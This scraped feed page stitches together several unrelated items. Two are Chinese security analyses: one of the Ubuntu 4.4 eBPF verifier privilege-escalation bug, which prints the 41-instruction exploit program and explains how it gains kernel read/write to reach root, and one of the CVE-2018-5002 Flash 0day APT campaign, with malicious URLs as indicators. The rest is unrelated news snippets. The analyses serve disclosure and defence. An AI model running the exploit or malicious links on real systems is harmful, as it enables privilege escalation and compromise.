到这里,我们回过头来看下第一个问题,既然漏洞原因一致,为什么Ubuntu 4.4的内核没有修复该漏洞呢?和Linux kernel的开发模式有关。

Linux kernel分mainline,stable,longterm 3种版本[9],一般安全问题都会在mainline中修复,但对于longterm,仅会选择重要的安全补丁进行backport,因此可能会出现,对某个漏洞不重视或判断有误,导致该漏洞仍然存在于longterm版本中,比如本次的4.4 longterm,最初Jann Horn并没有在报告中提到影响4.9以下的版本。 关于Linux kernel对longterm版本的维护,争论由来已久[10],社区主流意见是建议用户使用最新版本。但各个发行版(比如Ubuntu)出于稳定性及开发成本考虑,一般选择longterm版本作为base,自行维护一套kernel。

对于嵌入式系统,这个问题更严重,大量厂商代码导致内核升级的风险及成本都远高于backport安全补丁,因此大部分嵌入式系统至今也都在使用比较老的longterm版本。比如Google Android在去年Pixel /Pixel XL 2发布时,内核版本才从3.18升级到4.4,原因也许是3.18已经进入EOL了(End of Life),也就是社区要宣布3.18进入死亡期了,后续不会在backport安全补丁到3.18,而最新的mainline版本已经到了4.16。笔者去年也在Android kernel中发现了一个未修复的历史漏洞(已报告给google并修复),但upstream在2年前就修复了。

而Vitaly Nikolenko可能是基于CVE-2017-16995的报告,在4.4版本中发现存在类似漏洞,并找到了一个种更通用的利用方法(控制跳转指令)。

0×03 漏洞利用

根据上一节对漏洞原因的分析,我们利用漏洞绕过eBPF verifier机制后,就可以执行任意eBPF支持的指令,当然最直接的就是读写任意内存。漏洞利用步骤如下:

1.构造eBPF指令,利用ALU指令缺陷,绕过eBPF verifier机制;

2.构造eBPF指令,读取内核栈基址;

3.根据泄漏的SP地址,继续构造eBPF指令,读取task_struct地址,进而得到task_struct->cred地址;

4.构造eBPF指令,覆写cred->uid, cred->gid为0,完成提权。

漏洞利用的核心,在于精心构造的恶意eBPF指令,这段指令在Vitaly Nikolenko的exp中是16机制字符串(char *__prog),并不直观,笔者为了方便,写了个小工具,把这些指令还原成比较友好的形式,当然也可以利用eBPF的调试机制,在内核log中打印出eBPF指令的可读形式。我们来看下这段eBPF程序,共41条指令(笔者写的小工具的输出):

parsing eBPF prog, size 328, len 41
ins 0: code(b4) alu | = | imm, dst_reg 9, src_reg 0, off 0, imm ffffffff
ins 1: code(55) jmp | != | imm, dst_reg 9, src_reg 0, off 2, imm ffffffff
ins 2: code(b7) alu64 | = | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 3: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 4: code(18) ld | BPF_IMM | u64, dst_reg 9, src_reg 1, off 0, imm 3
ins 5: code(00) ld | BPF_IMM | u32, dst_reg 0, src_reg 0, off 0, imm 0
ins 6: code(bf) alu64 | = | src_reg, dst_reg 1, src_reg 9, off 0, imm 0
ins 7: code(bf) alu64 | = | src_reg, dst_reg 2, src_reg a, off 0, imm 0
ins 8: code(07) alu64 | += | imm, dst_reg 2, src_reg 0, off 0, imm fffffffc
ins 9: code(62) st | BPF_MEM | u32, dst_reg a, src_reg 0, off fffffffc, imm 0
ins 10: code(85) jmp | call | imm, dst_reg 0, src_reg 0, off 0, imm 1
ins 11: code(55) jmp | != | imm, dst_reg 0, src_reg 0, off 1, imm 0
ins 12: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 13: code(79) ldx | BPF_MEM | u64, dst_reg 6, src_reg 0, off 0, imm 0
ins 14: code(bf) alu64 | = | src_reg, dst_reg 1, src_reg 9, off 0, imm 0
ins 15: code(bf) alu64 | = | src_reg, dst_reg 2, src_reg a, off 0, imm 0
ins 16: code(07) alu64 | += | imm, dst_reg 2, src_reg 0, off 0, imm fffffffc
ins 17: code(62) st | BPF_MEM | u32, dst_reg a, src_reg 0, off fffffffc, imm 1
ins 18: code(85) jmp | call | imm, dst_reg 0, src_reg 0, off 0, imm 1
ins 19: code(55) jmp | != | imm, dst_reg 0, src_reg 0, off 1, imm 0
ins 20: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 21: code(79) ldx | BPF_MEM | u64, dst_reg 7, src_reg 0, off 0, imm 0
ins 22: code(bf) alu64 | = | src_reg, dst_reg 1, src_reg 9, off 0, imm 0
ins 23: code(bf) alu64 | = | src_reg, dst_reg 2, src_reg a, off 0, imm 0
ins 24: code(07) alu64 | += | imm, dst_reg 2, src_reg 0, off 0, imm fffffffc
ins 25: code(62) st | BPF_MEM | u32, dst_reg a, src_reg 0, off fffffffc, imm 2
ins 26: code(85) jmp | call | imm, dst_reg 0, src_reg 0, off 0, imm 1
ins 27: code(55) jmp | != | imm, dst_reg 0, src_reg 0, off 1, imm 0
ins 28: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 29: code(79) ldx | BPF_MEM | u64, dst_reg 8, src_reg 0, off 0, imm 0
ins 30: code(bf) alu64 | = | src_reg, dst_reg 2, src_reg 0, off 0, imm 0
ins 31: code(b7) alu64 | = | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 32: code(55) jmp | != | imm, dst_reg 6, src_reg 0, off 3, imm 0
ins 33: code(79) ldx | BPF_MEM | u64, dst_reg 3, src_reg 7, off 0, imm 0
ins 34: code(7b) stx | BPF_MEM | u64, dst_reg 2, src_reg 3, off 0, imm 0
ins 35: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 36: code(55) jmp | != | imm, dst_reg 6, src_reg 0, off 2, imm 1
ins 37: code(7b) stx | BPF_MEM | u64, dst_reg 2, src_reg a, off 0, imm 0
ins 38: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 39: code(7b) stx | BPF_MEM | u64, dst_reg 7, src_reg 8, off 0, imm 0
ins 40: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
parsed 41 ins, total 41 稍微解释下,ins 0 和 ins 1 一起完成了绕过eBPF verifier机制。ins 0指令后,regs[9] = 0xffffffff,但在verifier中,regs[9].imm = -1,当执行ins 1时,jmp指令判断regs[9] == 0xffffffff,注意regs[9]是64bit integer,因为sign extension,regs[9] == 0xffffffff结果为false,eBPF跳过2(off)条指令,继续往下执行;而在verifier中,jmp指令的regs[9].imm == insn->imm结果为true,程序走另一个分支,会执行ins 3 jmp|exit指令,导致verifier认为程序已结束,不会去检查其余的dead code。

这样因为eBPF的检测逻辑和运行时逻辑不一致,我们就绕过了verifier。后续的指令就是配合用户态exp完成对kernel内存的读写。

这里还需要知道下eBPF的map机制,eBPF为了用户态更高效的与内核态交互,设计了一套map机制,用户态程序和eBPF程序都可以对map区域的内存进行读写,交换数据。利用代码中,就是利用map机制,完成用户态程序与eBPF程序的交互。

ins4-ins5: regs[9] = struct bpf_map *map,得到用户态程序申请的map的地址,注意这2条指令,笔者的静态解析并不准确,获取map指针的指令,在eBPF verifier中,会对指令内容进行修改,替换map指针的值。 ins6-ins12: 调用bpf_map_lookup_elem(map, &key),返回值为regs[0] = &map->value[0] ins13: regs[6] = *regs[0], regs[6]得到map中key=0的value值 ins14-ins20: 继续调用bpf_map_lookup_elem(map, &key),regs[0] = &map->value[1] ins21: regs[7] = *regs[0],regs[7]得到map中key=1的value值 ins22-ins28: 继续调用bpf_map_lookup_elem(map, &key),regs[0] = &map->value[2] ins29: regs[8] = *regs[0],regs[8]得到map中key=2的value值 ins30: regs[2] = regs[0] ins32: if(regs[6] != 0) jmp ins32 + 3,根据用户态传入的key值不同,做不同的操作 ins33: regs[3] = *regs[7],读取regs[7]中地址的内容,用户态的read原语,就在这里完成,regs[7]中的地址为用户态传入的任意内核地址 ins34: *regs[2] = regs[3],把上调指令读取的值返回给用户态 ins36: if(regs[6] != 1) jmp ins36 + 2 ins37: *regs[2] = regs[FP], 读取eBPF的运行时栈指针,返回给用户态,注意这个eBPF的栈指针实际上指向bpf_prog_run函数中的一个局部uint64数组,在内核栈上,从这个值可以得到内核栈的基址,这段指令对应用户态的get_fp ins39: *regs[7] = regs[8],向regs[7]中的地址写入regs[8],对应用户态的write原语,regs[7]中的地址为用户态传入的任意内核地址

理解了这段eBPF程序,再看用户态exp就很容易理解了。需要注意的是,eBPF指令中的3个关键点:泄漏FP,读任意kernel地址,写任意kernel地址,在verifier中都是有检查的,但因为开始的2条指令完全绕过了verifier,导致后续的指令长驱直入。

笔者在Ubuntu 14.04上提权成功:这种攻击方式和传统的内存破坏型漏洞不同,不需要做复杂的内存布局,只需要修改用户态传入的数据,就可以达到控制程序指令流的目的,利用的是原有程序的正常功能,会完全绕过现有的各种内存防御机制(SMEP/SMAP等),有一种四两拨千斤的效果。这也是这两年流行的Data-Oriented Attacks,在linux kernel中似乎并不多见。

0×04 漏洞影响范围&修复

因为linux kernel的内核版本众多,对于安全漏洞的影响范围往往并不容易确认,最准确的方式是搞清楚漏洞根因后,从代码层面判断,但这也带来了高成本的问题,快速应急时,我们往往需要尽快确认漏洞影响范围。从前面的漏洞原理来看,笔者大致给一个全面的linux kernel受影响版本:

3.18-4.4所有版本(包括longterm 3.18,4.1,4.4);

<3.18,因内核eBPF还未引入verifier机制,不受影响。

对于大量用户使用的各个发行版,还需要具体确认,因为该漏洞的触发,还需要2个条件

1.Kernel编译选项CONFIG_BPF_SYSCALL打开,启用了bpf syscall;

2./proc/sys/kernel/unprivileged_bpf_disabled设置为0,允许非特权用户调用bpf syscall

而Ubuntu正好满足以上3个条件。关于修复,upstream kernel在3月22日发布的4.4.123版已经修复该漏洞[11][12], Ubuntu官方4月5日也正式发布了安全公告和修复版本[13][14],没有修复的同学可以尽快升级了。

但现在距漏洞Exp公开已经过去20多天了,在漏洞应急时,我们显然等不了这么久,回过头看看当初的临时修复方案:

1.设置/proc/sys/kernel/unprivileged_bpf_disabled为1,也是最简单有效的方式,虽然漏洞仍然存在,但会让exp失效;

2.使用Ubuntu的预发布源,更新Ubuntu 4.4的内核版本,因为是非正式版,其稳定性无法确认。

Vitaly Nikolenko在twitter上公布的Ubuntu预发布源:all 4.4 ubuntu aws instances are vulnerable: echo “deb http://archive.ubuntu.com/ubuntu/ xenial-proposed restricted main multiverse universe” > /etc/apt/sources.list && apt update && apt install linux-image-4.4.0-117-generic

Ubuntu的非正式内核版本,做了哪些修复,我们可以看下补丁的关键内容(注意这是Ubuntu的kernel版本,非upstream):

git diff Ubuntu-lts-4.4.0-116.140_14.04.1 Ubuntu-lts-4.4.0-117.141_14.04.1ALU指令区分了32bit和64bit立即数,同时regs[].imm改为了64bit integer
四两拨千斤:Ubuntu kernel eBPF 0day分析
还增加了一项有意思的检查,把所有的dead_code替换为nop指令,这个明显是针对exp来的,有点类似于exp的mitigation,upstream kernel可能并不一定喜欢这样的修复风格:)
四两拨千斤:Ubuntu kernel eBPF 0day分析
关于这个漏洞,Ubuntu还有一些相关的修复代码,感兴趣的读者,可以自行发掘。 我们再看下upstream kernel 4.4.123的修复,相比之下,要简洁的多,仅有3行代码改动[12]:

当处理32bit ALU指令时,如果imm为负数,直接忽略,认为是UNKNOWN_VALUE,这样也就避免了前面提到的verifer和运行时语义不一致的问题。


四两拨千斤:Ubuntu kernel eBPF 0day分析
另外Android kernel上,bpf sycall是没有启用的,所以不受该漏洞影响。 0×05 引发的思考

我们回顾以下整个漏洞分析过程,有几点值得注意和思考:

1.eBPF作为内核提供的一种强大机制,因为其复杂的过滤机制,稍有不慎,将会引入致命的安全问题,笔者推测后续eBPF可能还会有类似安全漏洞。 2.受限于linux kernel的开发模式及众多版本,安全漏洞的确认和修复可能存在被忽视的情况,出现N day变0 day的场景。 3.Vitaly Nikolenko公布漏洞exp后,有网友就提出了批评,在厂商发布正式补丁前,不应该公布细节。我们暂且不讨论Vitaly Nikolenko的动机,作为一名安全从业者,负责任的披露漏洞是基本守则。 4.笔者所在公司使用的OS是经过专门的团队量身定制,进行了不少的安全加固和冗余组件裁剪,故不受到此次漏洞影响。可见维护一个安全可靠的OS不失为保障大型企业的安全方案之一。

感谢阅读,行文匆忙,如有不正之处,敬请指出。

0×06 参考文档 [1] https://twitter.com/vnik5287/status/974439706896187392 [2] http://cyseclabs.com/exploits/upstream44.c [3] https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=BPF [4] https://www.ibm.com/developerworks/cn/linux/l-lo-eBPF-history/index.html [5] https://www.kernel.org/doc/Documentation/networking/filter.txt [6] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16995 [7] https://bugs.chromium.org/p/project-zero/issues/detail?id=1454&desc=3 [8] http://kernel.ubuntu.com/git/ubuntu/ubuntu-trusty.git/tree/?h=Ubuntu-lts-4.4.0-31.50_14.04.1 [9] https://www.kernel.org/ [10] https://lwn.net/Articles/700530/ [11] https://lwn.net/Articles/749963/ [12] https://lkml.org/lkml/2018/3/19/1499 [13] https://usn.ubuntu.com/3619-1/ [14] https://usn.ubuntu.com/3619-2/

* 本文来自腾讯安全应急响应中心(TSRC) 投稿 ,作者:Tencent Blade Team:Cradmin,转载须注明原文链接及出处。


          Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联      Cache   Translate Page      
背景

360企业安全威胁情报中心近期捕获到了一例使用Flash 0day漏洞配合微软Office文档发起的APT攻击案例,攻击使用的样本首次使用了无Flash文件内置技术(Office文档内不包含Flash实体文件)。我们在确认漏洞以后第一时间通知了厂商Adobe,成为国内第一个向厂商报告此攻击及相关漏洞的组织,Adobe在昨日发布的安全通告中致谢了360威胁情报中心。


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

Adobe反馈确认漏洞存在并公开致谢

整个漏洞攻击过程高度工程化:攻击者将Loader(第一阶段用于下载Exploit的Flash文件)、Exploit(第二阶段漏洞利用代码)、Payload(第三阶段ShellCode)分别部署在服务器上,只有每一阶段的攻击/检测成功才会继续下载执行下一阶段的代码,这样导致还原整个攻击流程和漏洞利用代码变得非常困难。360威胁情报中心通过样本的特殊构造分析、大数据关联、域名分析,发现本次使用的相关漏洞攻击武器疑似与Hacking Team有关。

由于此漏洞及相应的攻击代码极有可能被黑产和其他APT团伙改造以后利用来执行大规模的攻击,构成现实的威胁,因此,360威胁情报中心提醒用户采取应对措施。

相关漏洞概要 漏洞名称 Adobe Flash Player远程代码执行漏洞 威胁类型 远程代码执行 威胁等级 高 漏洞ID CVE-2018-5002 利用场景 攻击者通过网页下载、电子邮件、即时通讯等渠道向受害者发送恶意构造的Office文件诱使其打开处理,可能触发漏洞在用户系统上执行任意指令获取控制。 受影响系统及应用版本 Adobe Flash Player(29.0.0.171及更早的版本) 不受影响影响系统及应用版本 Adobe Flash Player 30.0.0.113(修复后的最新版本) 修复及升级地址 https://get.adobe.com/flashplayer/ 样本概况

从捕获到的攻击样本语言属性、CC服务器关联信息我们推断这是一起针对卡塔尔地区的APT攻击。样本于5月31日被上传到VirusTotal以后的几天内为0恶意检出的状态,直到6月7日也只有360公司的病毒查杀引擎将其识别为恶意代码,360威胁情报中心通过细致的分析发现了其中包含的0day漏洞的利用。


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联
攻击分析

通过对样本执行过程的跟踪记录,我们还原的样本整体执行流程如下:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

包含Flash 0day的恶意文档整体执行流程

诱饵文档

攻击者首先向相关人员发送含有Flash ActiveX对象的Excel诱饵文档,诱骗受害者打开:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联
Flash ActiveX控件

而诱饵文档中包含了一个FlashActiveX控件:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

但该FlashActiveX对象中并不包含实体Flash文件,需要加载的Flash文件通过ActiveX对象中的URL连接地址远程加载,这样能非常好的躲避杀毒软件查杀:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

通过Excel文档向远程加载的Flash传递参数,其中包含了第二阶段Flash的下载地址以及样本和CC服务器的通信地址:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联
第一阶段Flash

通过FlashActiveX对象中的URL连接地址下载回来一阶段的Flash文件,该Flash文件最主要的功能是继续和远程服务器通信并下载回来使用AES加密后的第二阶段Flash文件:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

获取第一阶段Flash文件

第二阶段Flash 0day

由于第一阶段的Flash会落地,所以为了避免实施漏洞攻击的Flash代码被查杀或者被捕获,攻击者通过第一阶段的Flash Loader继续从服务器下载加密的攻击模块并内存加载。

从服务器返回的数据为[KEY+AES加密数据]的形式,第一阶段的Flash文件将返回的数据解密出第二阶段的Flash文件:
Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

获取AES加密后的第二阶段Flash

解密出使用AES CBC模式加密的第二阶段的Flash文件:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

接着内存加载第二阶段的Flash文件,第二阶段的Flash文件中则包含Flash0day漏洞利用代码:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联
第三阶段ShellCode

Flash 0day漏洞利用代码执行成功后再向服务器通过POST请求返回第三阶段的ShellCode并执行最后的攻击:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联
0day漏洞分析 漏洞函数上下文

如下图所示漏洞的关键触发利用代码发生在replace函数中,漏洞触发成功后可以通过交换vector中的两个对象以转换为类型混淆来实现代码执行,函数执行前声明了两个SafeStr_5,SafeStr_7类型的对象实例,并将这两个对象实例作为参数交替传入函数SafeStr_61中,一共256个参数,SafeStr_5,SafeStr_7类型各占128个:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

SafeStr_5类如下所示:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

SafeStr_7类如下所示:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

Jit代码中生成对应的SafeStr_5类实例:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

最终进入SafeStr_61前生成的SafeStr_5,SafeStr_7类实例如下所示,其中前两个是全局声明的实例,后两个是replace中声明的实例,之后作为SafeStr_61参数传入:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

进入SafeStr_61函数前:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

SafeStr_61函数如下所示,首先创建了一个SafeStr_6的类实例(用于触发漏洞),及SafeStr_5,_SafeStr_7类型的vector,之后将参数交叉传入两个vector中:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

接着开始vector赋值:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

赋值之后如下所示:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联
漏洞成因

现在来看看用于触发漏洞的_SafeStr_6类实例,AS代码如下:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

可以看到,由于Flash解析器处理对应的Try-Catch代码块时没有合理处理好异常处理代码的作用范围,解析器误认为不会有代码可以执行到Catch语句内,因此没有对Catch中代码对应的字节码进行检测,而该函数中的li8(123456)操作由于会触发异常并被Catch捕获,这样由于对Catch代码块中的代码缺乏检查,那么代码中的字节码通过setlocal,getlocal操作就可以实现对栈上数据的非法修改,最终将栈上两个对象指针的位置进行的替换,从而转化为类型混淆来实现任意代码执行!

漏洞利用

再来看看触发漏洞的代码上下文,其中_SafeStr_6即为上图所示触发漏洞的类实例代码:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

如下所示可以看到对应SafeStr_5类型的vector中的一个对象的指针被修改为了SaftStr的对象指针,其寻址标记为0x1c1=449,即为上图中getlocal操作的变量:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

之后将SafeStr_7类型的vector中的一个对象的指针修改为了SaftSt_5r的对象指针:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

接着遍历SafeStr_5中的每个对象的m_p1成员变量,获取对应修改成SafeStr_7指针的成员:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

由于SafeStr_5对象被混淆成SafeStr_7,因此对该混淆的SafeStr_5对象的操作,实际上作用的是SafeStr_7的内存空间,此时通过设置SafeStr_5对象的m_p1变量,即可实现对SafeStr_7对象对应内存偏移的操作,而该偏移在SafeStr_7对象中指向了对应的SafeStr_5对象,此时相当于SafeStr_7.SafeStr_5.m_p1的操作受_SafeStr_5对象的m_p1对象的控制,从而实现指定地址读写,之后转化为任意代码执行:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联
溯源与关联 相似样本

结合该漏洞投递文件(Excel文档)插入Flash ActiveX控件的技巧(复合二进制bin+远程Flash加载),360威胁情报中心通过大数据关联到另外一个使用相同技巧的投递Flash漏洞利用的文档控件文件(MD5:5b92b7f4599f81145080aa5c3152dfd9):


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联
Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

其内置的用于加载远程Flash漏洞攻击的URL如下:

hxxps://mynewsfeeds.info/docs/P6KMO6/5v1z1p3r1p1o.swf

域名分析

该域名在2015年到2016年初用于下载多个SWF Payload文件:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

而该域名mynewsfeeds.info历史曾由 marchaopn@gmail.com 注册,在HackingTeam 2015年7月的泄露事件后,该域名做了隐私保护:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

结合360威胁情报平台,该域名也关联到CVE-2015-5119的漏洞利用样本,该漏洞同样也是Hacking Team泄露事件曝光的Flash 0day漏洞!


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联
域名为Hacking Team所属

其中 marchaopn@gmail.com 邮箱注册的签名证书正是Hacking Team所属:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

以及HackingTeam与客户的交流邮件中提到该域名和邮箱的信息:


Hacking Team卷土重来?CVE-2018-5002 Flash 0day漏洞APT攻击分析与关联

至此,360威胁情报中心通过本次泄露的0day漏洞利用样本的特殊构造方式找到一个高度相似的样本,而该样本则指向Hacking Team。

自Hacking Team泄露事件以来,其新的相关活动及其开发的间谍木马也被国外安全厂商和资讯网站多次披露,证明其并没有完全销声匿迹。

关于Hacking Team

360威胁情报中心结合多方面的关联,列举本次0day攻击事件和历史Hacking Team之间的一些对比:

l Hacking Team长期向多个情报机构或政府部门销售其网络间谍武器

l 在过去HackingTeam泄露资料中表明其对Flash 0day漏洞和利用技术有深厚的基础;而本次0day漏洞中的利用手法实现也是非常通用

l 本次0day漏洞的EXP制作方式和漏洞利用上也与HackingTeam过去的一些利用相似

防护建议

360威胁情报中心提醒各单位/企业用户,谨慎打开来源不明的文档,并尽快通过修复及升级地址下载安装最新版Adobe Flash Player,也可以安装360安全卫士/天擎等防病毒软件工具以尽可能降低风险。

参考 [1].补丁公告:

https://helpx.adobe.com/security/products/flash-player/apsb18-19.html

[2].修复及升级地址:

https://get.adobe.com/flashplayer/

[3].与Hacking Team相关联的信息

https://www.virustotal.com/#/domain/mynewsfeeds.info

https://www.threatcrowd.org/domain.php?domain=mynewsfeeds.info

https://domainbigdata.com/mynewsfeeds.info

https://github.com/Rafiot/HackedTeamCerts/blob/master/SignCert/xx!_windows_marc_certum_201509.cer

https://www.cybereason.com/blog/hacking-team-hacked-team-leak-unleashes-flame-like-capabilities-into-the-wild

https://wikileaks.org/hackingteam/emails/emailid/15128

IOC Excel文档 c8aaaa517277fb0dbb4bbf724245e663 第一阶段Flash文件 ee34f466491a5c5cd7423849f32b58f5 样本下载及通信的URL http://people.dohabayt.com/stab/65f6434672f90eba68b96530172db71a http://people.dohabayt.com/photos/doc/65f6434672f90eba68b96530172db71a http://people.dohabayt.com/download/65f6434672f90eba68b96530172db71a/ http://people.dohabayt.com/photos/doc/65f6434672f90eba68b96530172db71a

* 本文作者:360天眼实验室,转载注明来自CodeSec.Net


          The Rich, White Roots of Democrat Rage      Cache   Translate Page      
Democrats aim only to exploit minorities and the poor for votes, all while keeping them down. By Lewis Morris   ~     The Democrat Party has pursued a national strategy to make the midterms all about Donald Trump. (To be fair, Trump has happily obliged.) Democrats have identified Republican districts they believe they can flip and […]
          Les SSD M.2 NVMe M500 series de Biostar débarquent      Cache   Translate Page      

Âpres une présentation en juin dernier, Biostar annonce sa nouvelle famille de SSD M500. Au format M.2, ils exploitent le protocole NVMe 1.2 et se décline en plusieurs capacités. Ce M500 est une SSD M.2 NVMe 1.2 disponible en plusieurs capacités. La gamme propose du 128 Go, du 256 Go, du 512 Go et du ...

The post Les SSD M.2 NVMe M500 series de Biostar débarquent appeared first on GinjFo.


          Veolia: Volumes et économies tirent les résultats sur 9 mois      Cache   Translate Page      
PARIS (Reuters) - Veolia a publié mercredi des résultats en nette hausse au titre des neuf premiers mois de 2018, tirés notamment par les volumes de déchets et par son programme d'économies, et a confirmé l'ensemble de ses objectifs. Le numéro un mondial du traitement de l'eau et des déchets continue de tabler pour 2018, à changes constants, sur la poursuite d'une croissance "soutenue" de son chiffre d'affaires et sur une hausse de son excédent brut d'exploitation (Ebitda) supérieure à celle de 2017. Le groupe vise aussi toujours des réductions de coûts supérieures à 300 millions d'euros cette année.
          Government relaxing visa rules for foreign farm workers - ႏိုင္ငံျခားကလာတဲ့ စိုက္ပ်ဳိးေမြးျမဴေရး အလုပ္သမားေတြအတြက္ အစိုးရက ဗီဇာ ေျဖေလ်ာ့ေပးဖို႔ရွိေန      Cache   Translate Page      

The Federal Government says it will relax visa rules for foreign farm workers in a bid to permanently end worker shortages on farms.

The National Farmers' Federation has welcomed the changes, but the Australian Workers' Union has expressed concern it will expose foreign workers to further exploitation.

-

စိုက္ပ်ဳိးေရးနဲ႔ ေမြးျမဴေရးလုပ္ငန္းေတြအတြက္ အလုပ္သမား မလံုမေလာက္ျဖစ္ေနတာကို ရာသက္ပန္ အဆံုးသတ္ႏိုင္ဖို႔အတြက္ ႏိုင္ငံျခားကေနလာတဲ့ အလုပ္သမားေတြကို ဗီဇာ စည္းမ်ဥ္းစည္းကမ္းေတြ ေျဖေလ်ာ့ေပးသြားမယ္လို႔ အစိုးရက ေျပာပါတယ္။


          Two illegal workers jailed      Cache   Translate Page      
     Two illegal workers comprising a Vietnamese and an Indian were jailed by Shatin Magistrates' Courts yesterday (November 5).
      
     Immigration Department (ImmD) investigators received referrals from the Police to further investigate two illegal employment cases in September. A male Vietnamese illegal worker and a male Indian illegal worker, aged 31 and 44, were arrested at a recycling depot in Tin Shui Wai and a wet market in Kwun Tong respectively. When intercepted they were working as odd-job workers. Upon identity checking, they produced for inspection recognisance forms issued by the ImmD, which prohibit them from taking employment. Further investigation revealed that they were non-refoulement claimants. An employer suspected of employing an illegal worker was arrested and the investigation is ongoing.
      
     The two illegal workers were charged at Shatin Magistrates' Courts yesterday with taking employment after landing in Hong Kong unlawfully and remaining in Hong Kong without the authority of the Director of Immigration or while being a person in respect of whom a removal order or deportation order was in force. They pleaded guilty to the charges and they were sentenced to imprisonment ranging from 15 months to 15 months and two weeks.

     The ImmD spokesman warned that, as stipulated in section 38AA of the Immigration Ordinance, illegal immigrants or people who are the subject of a removal order or a deportation order are prohibited from taking any employment, whether paid or unpaid, or establishing or joining in any business. Offenders are liable upon conviction to a maximum fine of $50,000 and up to three years' imprisonment. The Court of Appeal has issued a guideline ruling that a sentence of 15 months' imprisonment should be applied in such cases.
      
     The spokesman reiterated that it is a serious offence to employ people who are not lawfully employable. The maximum penalty is imprisonment for three years and a fine of $350,000. The High Court has laid down sentencing guidelines that the employer of an illegal worker should be given an immediate custodial sentence. According to the court sentencing, employers must take all practicable steps to determine whether a person is lawfully employable prior to employment. Apart from inspecting a prospective employee's identity card, the employer has the explicit duty to make enquiries regarding the person and ensure that the answers would not cast any reasonable doubt concerning the lawful employability of the person. The court will not accept failure to do so as a defence in proceedings. It is also an offence if an employer fails to inspect the job seeker's valid travel document if the job seeker does not have a Hong Kong permanent identity card. The maximum penalty for failing to inspect such a document is imprisonment for one year and a fine of $150,000.
 
     Under the existing mechanism, the ImmD will, as a standard procedure, conduct initial screening on vulnerable persons, including illegal workers, illegal immigrants, sex workers and foreign domestic helpers, who are arrested during any operation, with a view to ascertaining whether they are trafficking in persons (TIP) victims. When any TIP indicator is revealed in the initial screening, the officers will conduct a full debriefing and identification by using a standardised checklist to ascertain the presence of TIP elements, such as threat and coercion in the recruitment phase and the nature of exploitation. Identified TIP victims will be provided with various forms of support and assistance, including urgent interference, medical services, counselling, shelter, temporary accommodation and other supporting services. The ImmD calls on TIP victims to report crimes to the relevant departments.
          Comment on Why Creating Wealth Is Not Exploitative by Luis A. Martinez      Cache   Translate Page      
Dear Father Sirico, I have just posted your excellent article on my FB page (https://www.facebook.com/luis.martinez.77920526?__tn__=%2CdC-R-R&eid=ARCiWUnoCpcX1aIBGan2sljPGB4qC4v3aJTcPAwL5iOCLOZNCuDnOCDJda9bEIt4cowSE-r4x2X0Lr3u&hc_ref=ART1bLnHkG_cAh7HtDjSImNhUulDIvkEvIalnKBNYPEyudja8vgQo3MPTyrBTqNIvbM&fref=nf) I will also post in on my Twitter account. I love reading topics like this. By way of background, my entire extended family are immigrants from Cuba.
          Smart Cities sécuritaires : la CNIL forfait ?      Cache   Translate Page      

